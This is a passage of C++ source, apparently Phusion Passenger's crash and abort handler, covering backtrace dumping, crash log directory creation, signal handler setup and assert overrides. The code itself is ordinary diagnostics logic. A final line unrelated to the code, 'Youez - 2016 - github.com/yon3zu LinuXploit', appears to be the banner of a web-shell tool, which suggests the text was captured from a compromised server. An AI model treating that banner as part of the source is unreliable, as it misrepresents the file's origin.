				pos = ASSU::appendData(pos, end, ctx->backtraceSanitizerCommand);
				pos = ASSU::appendData(pos, end, "' for sanitizing the backtrace, trying 'cat'...\n");
				write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
				execlp("cat", "cat", (char *) 0);
				execlp("/bin/cat", "cat", (char *) 0);
				execlp("/usr/bin/cat", "cat", (char *) 0);

				const char *commandArray[] = { "cat", NULL };
				printExecError2(commandArray, errno, state.messageBuf, sizeof(state.messageBuf));
				_exit(1);

			} else if (pid == -1) {
				close(p[0]);
				close(p[1]);
				int e = errno;
				pos = state.messageBuf;
				pos = ASSU::appendData(pos, end, "Could not dump diagnostics through backtrace sanitizer: fork() failed: ");
				pos = ASSU::appendData(pos, end, ASSU::limitedStrerror(e));
				pos = ASSU::appendData(pos, end, " (errno=");
				pos = ASSU::appendInteger<int, 10>(pos, end, e);
				pos = ASSU::appendData(pos, end, ")\n");
				pos = ASSU::appendData(pos, end, "Falling back to writing to stderr directly...\n");
				write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
				backtrace_symbols_fd(backtraceStore, frames, STDERR_FILENO);

			} else {
				int status = -1;

				close(p[0]);
				backtrace_symbols_fd(backtraceStore, frames, p[1]);
				close(p[1]);
				if (waitpid(pid, &status, 0) == -1 || status != 0) {
					pos = state.messageBuf;
					pos = ASSU::appendData(pos, end, "ERROR: cannot execute '");
					pos = ASSU::appendData(pos, end, ctx->backtraceSanitizerCommand);
					pos = ASSU::appendData(pos, end, "' for sanitizing the backtrace, writing to stderr directly...\n");
					write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
					backtrace_symbols_fd(backtraceStore, frames, STDERR_FILENO);
				}
			}

		} else {
			backtrace_symbols_fd(backtraceStore, frames, STDERR_FILENO);
		}
	}
#endif

static void
runCustomDiagnosticsDumper(AbortHandlerWorkingState &state, void *userData) {
	unsigned int i = static_cast<unsigned int>(reinterpret_cast<boost::uintptr_t>(userData));
	const AbortHandlerConfig::DiagnosticsDumper &dumper = ctx->config->diagnosticsDumpers[i];

	if (state.crashLogDirFd != -1) {
		int fd = openat(state.crashLogDirFd, dumper.logFileName, O_WRONLY | O_CREAT | O_TRUNC, 0600);
		if (fd != -1) {
			printCrashLogFileCreated(state, dumper.logFileName);
			dup2(fd, STDOUT_FILENO);
			dup2(fd, STDERR_FILENO);
			close(fd);
		} else {
			printCrashLogFileCreationError(state, dumper.logFileName, errno);
		}
	}

	dumper.func(dumper.userData);
}

// This function is performed in a child process.
static void
dumpDiagnostics(AbortHandlerWorkingState &state) {
	char *pos;
	const char *end = state.messageBuf + sizeof(state.messageBuf);
	pid_t pid;
	int status;

	pos = state.messageBuf;
	pos = ASSU::appendData(pos, end, state.messagePrefix);
	pos = ASSU::appendData(pos, end, " ] Date and uname:\n");
	write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

	// Dump human-readable time string and string.
	pid = asyncFork();
	if (pid == 0) {
		closeAllFileDescriptors(2, true);
		execlp("date", "date", (char *) 0);
		_exit(1);
	} else if (pid == -1) {
		ASSU::printError("ERROR: Could not fork a process to dump the time!\n");
	} else if (waitpid(pid, &status, 0) != pid || status != 0) {
		ASSU::printError("ERROR: Could not run 'date'!\n");
	}

	// Dump system uname.
	pid = asyncFork();
	if (pid == 0) {
		closeAllFileDescriptors(2, true);
		execlp("uname", "uname", "-mprsv", (char *) 0);
		_exit(1);
	} else if (pid == -1) {
		ASSU::printError("ERROR: Could not fork a process to dump the uname!\n");
	} else if (waitpid(pid, &status, 0) != pid || status != 0) {
		ASSU::printError("ERROR: Could not run 'uname -mprsv'!\n");
	}

	pos = state.messageBuf;
	pos = ASSU::appendData(pos, end, state.messagePrefix);
	pos = ASSU::appendData(pos, end, " ] " PROGRAM_NAME " version: " PASSENGER_VERSION "\n");
	write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

	if (LoggingKit::lastAssertionFailure.filename != NULL) {
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] Last assertion failure: (");
		pos = ASSU::appendData(pos, end, LoggingKit::lastAssertionFailure.expression);
		pos = ASSU::appendData(pos, end, "), ");
		if (LoggingKit::lastAssertionFailure.function != NULL) {
			pos = ASSU::appendData(pos, end, "function ");
			pos = ASSU::appendData(pos, end, LoggingKit::lastAssertionFailure.function);
			pos = ASSU::appendData(pos, end, ", ");
		}
		pos = ASSU::appendData(pos, end, "file ");
		pos = ASSU::appendData(pos, end, LoggingKit::lastAssertionFailure.filename);
		pos = ASSU::appendData(pos, end, ", line ");
		pos = ASSU::appendInteger<unsigned int, 10>(pos, end, LoggingKit::lastAssertionFailure.line);
		pos = ASSU::appendData(pos, end, ".\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
	}

	// It is important that writing the message and the backtrace are two
	// seperate operations because it's not entirely clear whether the
	// latter is async signal safe and thus can crash.
	pos = state.messageBuf;
	pos = ASSU::appendData(pos, end, state.messagePrefix);
	#ifdef LIBC_HAS_BACKTRACE_FUNC
		pos = ASSU::appendData(pos, end, " ] libc backtrace available!\n");
	#else
		pos = ASSU::appendData(pos, end, " ] libc backtrace not available.\n");
	#endif
	write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

	#ifdef LIBC_HAS_BACKTRACE_FUNC
		runInSubprocessWithTimeLimit(state, dumpBacktrace, NULL, 4000);
	#endif

	ASSU::printError("--------------------------------------\n");

	dumpUlimits(state);

	ASSU::printError("--------------------------------------\n");

	for (unsigned int i = 0; i < AbortHandlerConfig::MAX_DIAGNOSTICS_DUMPERS; i++) {
		const AbortHandlerConfig::DiagnosticsDumper &diagnosticsDumper = ctx->config->diagnosticsDumpers[i];
		if (diagnosticsDumper.func == NULL) {
			continue;
		}

		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] Dumping ");
		pos = ASSU::appendData(pos, end, diagnosticsDumper.name);
		pos = ASSU::appendData(pos, end, "...\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
		runInSubprocessWithTimeLimit(state, runCustomDiagnosticsDumper,
			reinterpret_cast<void *>(static_cast<boost::uintptr_t>(i)), 2000);
		ASSU::printError("--------------------------------------\n");
	}

	dumpFileDescriptorInfo(state);
	ASSU::printError("--------------------------------------\n");

	if (ctx->config->dumpWithCrashWatch && ctx->crashWatchCommand != NULL) {
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		#ifdef LIBC_HAS_BACKTRACE_FUNC
			pos = ASSU::appendData(pos, end, " ] Dumping a more detailed backtrace with crash-watch...\n");
		#else
			pos = ASSU::appendData(pos, end, " ] Dumping a backtrace with crash-watch...\n");
		#endif
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
		dumpWithCrashWatch(state);
	} else {
		write_nowarn(STDERR_FILENO, "\n", 1);
	}

	if (state.crashLogDir[0] != '\0') {
		ASSU::printError("--------------------------------------\n");
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] **************** LOOK HERE FOR CRASH DETAILS *****************\n\n");
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] Crash log dumped to this directory:\n");
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] ");
		pos = ASSU::appendData(pos, end, state.crashLogDir);
		pos = ASSU::appendData(pos, end, "\n\n");
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] **************** LOOK ABOVE FOR CRASH DETAILS ****************\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
	}
}

static bool
createCrashLogDir(AbortHandlerWorkingState &state, time_t t) {
	char *suffixBegin = state.crashLogDir;
	const char *end = state.crashLogDir + sizeof(state.crashLogDir) - 1;
	suffixBegin = ASSU::appendData(suffixBegin, end, "/var/tmp/passenger-crash-log.");
	suffixBegin = ASSU::appendInteger<time_t, 10>(suffixBegin, end, t);
	suffixBegin = ASSU::appendData(suffixBegin, end, ".");

	// Try a bunch of times to find and create a unique path.
	for (unsigned int i = 0; i < MAX_RANDOM_TOKENS; i++) {
		char *pos = suffixBegin;
		pos = ASSU::appendData(pos, end, ctx->randomTokens + RANDOM_TOKEN_SIZE * i,
			RANDOM_TOKEN_SIZE);
		*pos = '\0';

		int ret;
		do {
			ret = mkdir(state.crashLogDir, 0700);
		} while (ret == -1 && errno == EINTR);
		if (ret == -1) {
			if (errno == EEXIST) {
				// Directory exists; try again.
				continue;
			} else {
				int e = errno;
				end = state.messageBuf + sizeof(state.messageBuf);
				pos = state.messageBuf;
				pos = ASSU::appendData(pos, end, state.messagePrefix);
				pos = ASSU::appendData(pos, end, " ] Error creating directory ");
				pos = ASSU::appendData(pos, end, state.crashLogDir);
				pos = ASSU::appendData(pos, end, " for storing crash log: ");
				pos = ASSU::appendData(pos, end, ASSU::limitedStrerror(e));
				pos = ASSU::appendData(pos, end, " (errno=");
				pos = ASSU::appendInteger<int, 10>(pos, end, e);
				pos = ASSU::appendData(pos, end, ")\n");
				write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
				state.crashLogDir[0] = '\0';
				return false;
			}
		}

		do {
			state.crashLogDirFd = open(state.crashLogDir, O_RDONLY);
		} while (state.crashLogDirFd == -1 && errno == EINTR);
		if (state.crashLogDirFd == -1) {
			int e = errno;
			end = state.messageBuf + sizeof(state.messageBuf);
			pos = state.messageBuf;
			pos = ASSU::appendData(pos, end, state.messagePrefix);
			pos = ASSU::appendData(pos, end, " ] Error opening created directory ");
			pos = ASSU::appendData(pos, end, state.crashLogDir);
			pos = ASSU::appendData(pos, end, " for storing crash log: ");
			pos = ASSU::appendData(pos, end, ASSU::limitedStrerror(e));
			pos = ASSU::appendData(pos, end, " (errno=");
			pos = ASSU::appendInteger<int, 10>(pos, end, e);
			pos = ASSU::appendData(pos, end, ")\n");
			write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
			state.crashLogDir[0] = '\0';
			return false;
		}

		return true;
	}

	state.crashLogDir[0] = '\0';
	return false;
}

static bool
forkAndRedirectToTeeAndMainLogFile(const char *crashLogDir) {
	int p[2];
	if (pipe(p) == -1) {
		return false;
	}

	char filename[300];
	char *pos = filename;
	const char *end = filename + sizeof(filename) - 1;

	pos = ASSU::appendData(pos, end, crashLogDir);
	pos = ASSU::appendData(pos, end, "/");
	pos = ASSU::appendData(pos, end, "main.log");
	*pos = '\0';

	pid_t pid = asyncFork();
	if (pid == 0) {
		close(p[1]);
		dup2(p[0], STDIN_FILENO);
		execlp("tee", "tee", filename, (char *) 0);
		execlp("/usr/bin/tee", "tee", filename, (char *) 0);
		execlp("cat", "cat", (char *) 0);
		execlp("/bin/cat", "cat", (char *) 0);
		execlp("/usr/bin/cat", "cat", (char *) 0);
		ASSU::printError("ERROR: cannot execute 'tee' or 'cat'; crash log will be lost!\n");
		_exit(1);
		return false;
	} else if (pid == -1) {
		ASSU::printError("ERROR: cannot fork a process for executing 'tee'\n");
		return false;
	} else {
		close(p[0]);
		dup2(p[1], STDOUT_FILENO);
		dup2(p[1], STDERR_FILENO);
		return true;
	}
}

static void
closeEmergencyPipes() {
	if (ctx->emergencyPipe1[0] != -1) {
		close(ctx->emergencyPipe1[0]);
	}
	if (ctx->emergencyPipe1[1] != -1) {
		close(ctx->emergencyPipe1[1]);
	}
	if (ctx->emergencyPipe2[0] != -1) {
		close(ctx->emergencyPipe2[0]);
	}
	if (ctx->emergencyPipe2[1] != -1) {
		close(ctx->emergencyPipe2[1]);
	}
	ctx->emergencyPipe1[0] = ctx->emergencyPipe1[1] = -1;
	ctx->emergencyPipe2[0] = ctx->emergencyPipe2[1] = -1;
}

static void
abortHandler(int signo, siginfo_t *info, void *_unused) {
	AbortHandlerWorkingState state;

	state.pid = getpid();
	state.signo = signo;
	state.info = info;
	pid_t child;
	time_t t = time(NULL);

	ctx->callCount++;
	if (ctx->callCount > 1) {
		// The abort handler itself crashed!
		const char *end = state.messageBuf + sizeof(state.messageBuf);
		char *pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, "[ origpid=");
		pos = ASSU::appendInteger<pid_t, 10>(pos, end, state.pid);
		pos = ASSU::appendData(pos, end, ", pid=");
		pos = ASSU::appendInteger<pid_t, 10>(pos, end, getpid());
		pos = ASSU::appendData(pos, end, ", timestamp=");
		pos = ASSU::appendInteger<time_t, 10>(pos, end, t);
		if (ctx->callCount == 2) {
			// This is the first time it crashed.
			pos = ASSU::appendData(pos, end, " ] Abort handler crashed! signo=");
			pos = appendSignalName(pos, end, state.signo);
			pos = ASSU::appendData(pos, end, ", reason=");
			pos = appendSignalReason(pos, end, state.info);
			pos = ASSU::appendData(pos, end, "\n");
			write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
			// Run default signal handler.
			raise(signo);
		} else {
			// This is the second time it crashed, meaning it failed to
			// invoke the default signal handler to abort the process!
			pos = ASSU::appendData(pos, end, " ] Abort handler crashed again! Force exiting this time. signo=");
			pos = appendSignalName(pos, end, state.signo);
			pos = ASSU::appendData(pos, end, ", reason=");
			pos = appendSignalReason(pos, end, state.info);
			pos = ASSU::appendData(pos, end, "\n");
			write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
			_exit(1);
		}
		return;
	}

	closeEmergencyPipes();

	{
		const char *end = state.messagePrefix + sizeof(state.messagePrefix);
		char *pos = state.messagePrefix;
		pos = ASSU::appendData(pos, end, "[ pid=");
		pos = ASSU::appendInteger<pid_t, 10>(pos, end, state.pid);
		*pos = '\0';
	}

	/* We want to dump the entire crash log to both stderr and a log file.
	 * We use 'tee' for this.
	 */
	state.crashLogDir[0] = '\0';
	state.crashLogDirFd = -1;
	if (createCrashLogDir(state, t)) {
		forkAndRedirectToTeeAndMainLogFile(state.crashLogDir);
	}

	const char *end = state.messageBuf + sizeof(state.messageBuf);
	char *pos = state.messageBuf;
	// Print a \n just in case we're aborting in the middle of a non-terminated line.
	pos = ASSU::appendData(pos, end, "\n");
	pos = ASSU::appendData(pos, end, state.messagePrefix);
	pos = ASSU::appendData(pos, end, ", timestamp=");
	pos = ASSU::appendInteger<time_t, 10>(pos, end, t);
	pos = ASSU::appendData(pos, end, " ] Process aborted! signo=");
	pos = appendSignalName(pos, end, state.signo);
	pos = ASSU::appendData(pos, end, ", reason=");
	pos = appendSignalReason(pos, end, state.info);
	pos = ASSU::appendData(pos, end, ", randomSeed=");
	pos = ASSU::appendInteger<unsigned int, 10>(pos, end, ctx->config->randomSeed);
	pos = ASSU::appendData(pos, end, "\n");
	write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

	pos = state.messageBuf;
	if (state.crashLogDir[0] != '\0') {
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] Crash log files will be dumped to ");
		pos = ASSU::appendData(pos, end, state.crashLogDir);
		pos = ASSU::appendData(pos, end, " <--- ******* LOOK HERE FOR DETAILS!!! *******\n");
	} else {
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] Could not create crash log directory, so dumping to stderr only.\n");
	}
	write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

	if (ctx->config->beep) {
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] PASSENGER_BEEP_ON_ABORT on, executing beep...\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

		child = asyncFork();
		if (child == 0) {
			closeAllFileDescriptors(2, true);
			#ifdef __APPLE__
				const char *command[] = { "osascript", NULL };
				execlp("osascript", "osascript", "-e", "beep 2", (char *) 0);
				printExecError2(command, errno, state.messageBuf, sizeof(state.messageBuf));
			#else
				const char *command[] = { "beep", NULL };
				execlp("beep", "beep", (char *) 0);
				printExecError2(command, errno, state.messageBuf, sizeof(state.messageBuf));
			#endif
			_exit(1);

		} else if (child == -1) {
			int e = errno;
			pos = state.messageBuf;
			pos = ASSU::appendData(pos, end, state.messagePrefix);
			pos = ASSU::appendData(pos, end, " ] Could fork a child process for invoking a beep: fork() failed with errno=");
			pos = ASSU::appendInteger<int, 10>(pos, end, e);
			pos = ASSU::appendData(pos, end, "\n");
			write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
		}
	}

	if (ctx->config->stopProcess) {
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] PASSENGER_STOP_ON_ABORT on, so process stopped. Send SIGCONT when you want to continue.\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
		raise(SIGSTOP);
	}

	// It isn't safe to call any waiting functions in this signal handler,
	// not even read() and waitpid() even though they're async signal safe.
	// So we fork a child process and let it dump as much diagnostics as possible
	// instead of doing it in this process.
	child = asyncFork();
	if (child == 0) {
		// Sleep for a short while to allow the parent process to raise SIGSTOP.
		// usleep() and nanosleep() aren't async signal safe so we use select()
		// instead.
		struct timeval tv;
		tv.tv_sec = 0;
		tv.tv_usec = 100000;
		select(0, NULL, NULL, NULL, &tv);

		resetSignalHandlersAndMask();

		child = asyncFork();
		if (child == 0) {
			// OS X: for some reason the SIGPIPE handler may be reset to default after forking.
			// Later in this program we're going to pipe backtrace_symbols_fd() into the backtrace
			// sanitizer, which may fail, and we don't want the diagnostics process to crash
			// with SIGPIPE as a result, so we ignore SIGPIPE again.
			ignoreSigpipe();
			dumpDiagnostics(state);
			// The child process may or may or may not resume the original process.
			// We do it ourselves just to be sure.
			kill(state.pid, SIGCONT);
			_exit(0);

		} else if (child == -1) {
			int e = errno;
			pos = state.messageBuf;
			pos = ASSU::appendData(pos, end, state.messagePrefix);
			pos = ASSU::appendData(pos, end, "] Could not fork a child process for dumping diagnostics: fork() failed with errno=");
			pos = ASSU::appendInteger<int, 10>(pos, end, e);
			pos = ASSU::appendData(pos, end, "\n");
			write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
			_exit(1);

		} else {
			// Exit immediately so that child process is adopted by init process.
			_exit(0);
		}

	} else if (child == -1) {
		int e = errno;
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, state.messagePrefix);
		pos = ASSU::appendData(pos, end, " ] Could not fork a child process for dumping diagnostics: fork() failed with errno=");
		pos = ASSU::appendInteger<int, 10>(pos, end, e);
		pos = ASSU::appendData(pos, end, "\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

	} else {
		raise(SIGSTOP);
		// Will continue after the child process has done its job.
	}

	// Run default signal handler.
	raise(signo);
}

void
installAbortHandler(const AbortHandlerConfig *config) {
	ctx = new AbortHandlerContext();
	memset(ctx, 0, sizeof(AbortHandlerContext));

	ctx->config = config;
	ctx->backtraceSanitizerPassProgramInfo = true;
	ctx->randomTokens = strdup(RandomGenerator().generateAsciiString(
		MAX_RANDOM_TOKENS * RANDOM_TOKEN_SIZE).c_str());
	ctx->emergencyPipe1[0] = -1;
	ctx->emergencyPipe1[1] = -1;
	ctx->emergencyPipe2[0] = -1;
	ctx->emergencyPipe2[1] = -1;

	abortHandlerConfigChanged();

	IGNORE_SYSCALL_RESULT(pipe(ctx->emergencyPipe1));
	IGNORE_SYSCALL_RESULT(pipe(ctx->emergencyPipe2));

	size_t alternativeStackSize = MINSIGSTKSZ + 128 * 1024;
	ctx->alternativeStack = (char *) malloc(alternativeStackSize);
	if (ctx->alternativeStack == NULL) {
		fprintf(stderr, "Cannot allocate an alternative stack with a size of %lu bytes!\n",
			(unsigned long) alternativeStackSize);
		fflush(stderr);
		abort();
	}

	stack_t stack;
	stack.ss_sp = ctx->alternativeStack;
	stack.ss_size = alternativeStackSize;
	stack.ss_flags = 0;
	if (sigaltstack(&stack, NULL) != 0) {
		int e = errno;
		fprintf(stderr, "Cannot install an alternative stack for use in signal handlers: %s (%d)\n",
			strerror(e), e);
		fflush(stderr);
		abort();
	}

	struct sigaction action;
	action.sa_sigaction = abortHandler;
	action.sa_flags = SA_RESETHAND | SA_SIGINFO;
	sigemptyset(&action.sa_mask);
	sigaction(SIGABRT, &action, NULL);
	sigaction(SIGSEGV, &action, NULL);
	sigaction(SIGBUS, &action, NULL);
	sigaction(SIGFPE, &action, NULL);
	sigaction(SIGILL, &action, NULL);
}

bool
abortHandlerInstalled() {
	return ctx != NULL;
}

void
abortHandlerLogFds() {
	if (ctx->emergencyPipe1[0] != -1) {
		P_LOG_FILE_DESCRIPTOR_OPEN4(ctx->emergencyPipe1[0], __FILE__, __LINE__,
			"Emergency pipe 1-0");
		P_LOG_FILE_DESCRIPTOR_OPEN4(ctx->emergencyPipe1[1], __FILE__, __LINE__,
			"Emergency pipe 1-1");
	}
	if (ctx->emergencyPipe2[0] != -1) {
		P_LOG_FILE_DESCRIPTOR_OPEN4(ctx->emergencyPipe2[0], __FILE__, __LINE__,
			"Emergency pipe 2-0");
		P_LOG_FILE_DESCRIPTOR_OPEN4(ctx->emergencyPipe2[1], __FILE__, __LINE__,
			"Emergency pipe 2-1");
	}
}

static void
useCxxFiltAsBacktraceSanitizer() {
	ctx->backtraceSanitizerCommand = strdup("c++filt -n");
	ctx->backtraceSanitizerPassProgramInfo = false;
}

void
abortHandlerConfigChanged() {
	const AbortHandlerConfig *config = ctx->config;
	char *oldInstallSpec = ctx->installSpec;
	char *oldRubyLibDir = ctx->rubyLibDir;
	char *oldTmpDir = ctx->tmpDir;
	char *oldCrashWatchCommand = ctx->crashWatchCommand;
	char *oldBacktraceSanitizerCommand = ctx->backtraceSanitizerCommand;

	if (config->resourceLocator != NULL) {
		string path;
		const ResourceLocator *locator = config->resourceLocator;

		ctx->installSpec = strdup(locator->getInstallSpec().c_str());
		ctx->rubyLibDir = strdup(locator->getRubyLibDir().c_str());
		ctx->tmpDir = strdup(getSystemTempDir());

		path = locator->getHelperScriptsDir() + "/crash-watch.rb";
		ctx->crashWatchCommand = strdup(path.c_str());

		if (ctx->installSpec == NULL || ctx->rubyLibDir == NULL
			|| ctx->tmpDir == NULL || ctx->crashWatchCommand == NULL)
		{
			fprintf(stderr, "Cannot allocate memory for abort handler!\n");
			fflush(stderr);
			abort();
		}

		#ifdef __linux__
			path = StaticString(config->ruby) + " \""
				+ locator->getHelperScriptsDir() +
				"/backtrace-sanitizer.rb\"";
			ctx->backtraceSanitizerCommand = strdup(path.c_str());
			ctx->backtraceSanitizerPassProgramInfo = true;
			if (ctx->backtraceSanitizerCommand == NULL) {
				fprintf(stderr, "Cannot allocate memory for abort handler!\n");
				fflush(stderr);
				abort();
			}
		#else
			useCxxFiltAsBacktraceSanitizer();
		#endif
	} else {
		ctx->installSpec = NULL;
		ctx->rubyLibDir = NULL;
		ctx->tmpDir = NULL;
		ctx->crashWatchCommand = NULL;
		useCxxFiltAsBacktraceSanitizer();
	}

	free(oldInstallSpec);
	free(oldRubyLibDir);
	free(oldTmpDir);
	free(oldCrashWatchCommand);
	free(oldBacktraceSanitizerCommand);
}

void
shutdownAbortHandler() {
	free(ctx->installSpec);
	free(ctx->rubyLibDir);
	free(ctx->tmpDir);
	free(ctx->crashWatchCommand);
	free(ctx->backtraceSanitizerCommand);
	free(ctx->randomTokens);
	free(ctx->alternativeStack);
	closeEmergencyPipes();
	delete ctx;
	ctx = NULL;
}


} // namespace Fundamentals
} // namespace Agent
} // namespace Passenger


/*
 * Override assert() to add more features and to fix bugs. We save the information
 * of the last assertion failure in a global variable so that we can print it
 * to the crash diagnostics report.
 */
#if defined(__GLIBC__)
	extern "C" __attribute__ ((__noreturn__))
	void
	__assert_fail(__const char *__assertion, __const char *__file,
		unsigned int __line, __const char *__function)
	{
		using namespace Passenger;

		LoggingKit::lastAssertionFailure.filename = __file;
		LoggingKit::lastAssertionFailure.line = __line;
		LoggingKit::lastAssertionFailure.function = __function;
		LoggingKit::lastAssertionFailure.expression = __assertion;
		fprintf(stderr, "Assertion failed! %s:%u: %s: %s\n", __file, __line, __function, __assertion);
		fflush(stderr);
		abort();
	}

#elif defined(__APPLE__)
	/* On OS X, raise() and abort() unfortunately send SIGABRT to the main thread,
	 * causing the original backtrace to be lost in the signal handler.
	 * We work around this for anything in the same linkage unit by just definin
	 * our own versions of the assert handler and abort.
	 */

	#include <pthread.h>

	extern "C" int
	raise(int sig) {
		return pthread_kill(pthread_self(), sig);
	}

	extern "C" void
	__assert_rtn(const char *func, const char *file, int line, const char *expr) {
		using namespace Passenger;

		LoggingKit::lastAssertionFailure.filename = file;
		LoggingKit::lastAssertionFailure.line = line;
		LoggingKit::lastAssertionFailure.function = func;
		LoggingKit::lastAssertionFailure.expression = expr;
		if (func) {
			fprintf(stderr, "Assertion failed: (%s), function %s, file %s, line %d.\n",
				expr, func, file, line);
		} else {
			fprintf(stderr, "Assertion failed: (%s), file %s, line %d.\n",
				expr, file, line);
		}
		fflush(stderr);
		abort();
	}

	extern "C" void
	abort() {
		sigset_t set;
		sigemptyset(&set);
		sigaddset(&set, SIGABRT);
		pthread_sigmask(SIG_UNBLOCK, &set, NULL);
		raise(SIGABRT);
		usleep(1000);
		__builtin_trap();
	}
#endif /* __APPLE__ */

Youez - 2016 - github.com/yon3zu
LinuXploit